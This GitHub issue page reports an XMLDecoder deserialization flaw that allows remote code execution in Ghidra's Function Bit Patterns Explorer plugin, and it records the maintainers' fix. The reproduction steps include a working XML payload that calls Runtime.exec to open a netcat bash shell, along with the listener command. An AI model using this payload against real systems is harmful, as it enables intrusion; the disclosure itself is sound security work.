Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RCE possible in Function Bit Patterns Explorer Plugin #1090

Closed
purpleracc00n opened this issue Sep 28, 2019 · 1 comment
Closed

RCE possible in Function Bit Patterns Explorer Plugin #1090

purpleracc00n opened this issue Sep 28, 2019 · 1 comment
Assignees
Milestone

Comments

@purpleracc00n
Copy link

purpleracc00n commented Sep 28, 2019

Description:
XMLDecoder is used in FileBitPatternInfoReader.java which causes a Remote Code Execution in the Bit Patterns Explorer Plugin.

Steps to reproduce the behavior:
1: Open a binary with CodeBrowser
2. Go to Window->Script Manager and select the "DumpFunctionPatternInfoScript"
3. Export the resulted XML file.
4. Add the following at the end of the file, after the closing tag of the last object and before the </java> closing tag:

<object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 1337 -c ’/bin/bash’</string> </void> </object>

  1. Open local listening server with : nc -lvnp 1337
  2. Go to Window->Function Bit Patterns Explorer (you will need to enable experimental mode from configuration first File->Configure...)
  3. In the opened plugin window, click "Read XML Files", point to the directory where the XML file was saved and click OK.
  4. Go back to the listener and see the shell opened.

Expected behavior
No code from the xml files should be executed while running this plugin.

Environment:

  • OS: Kali Linux x86_64
  • Java Version: 11.0.4
  • Ghidra Version: 9.0.4
@dev747368 dev747368 self-assigned this Sep 30, 2019
@ryanmkurtz ryanmkurtz assigned ryanmkurtz and unassigned dev747368 Sep 30, 2019
@ryanmkurtz ryanmkurtz added this to the 9.1 milestone Oct 1, 2019
@dev747368 dev747368 self-assigned this Oct 1, 2019
ryanmkurtz pushed a commit that referenced this issue Oct 2, 2019
Java's built-in XMLEncoder / XMLDecoder is too flexible and allows the
XML data being decoded to execute arbitrary commands and other
non-niceness to happen.

Replace FunctionBitPatternExplorerPlugin's usage with manual
serializing.
@ryanmkurtz
Copy link
Collaborator

Fixed by a17728f

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants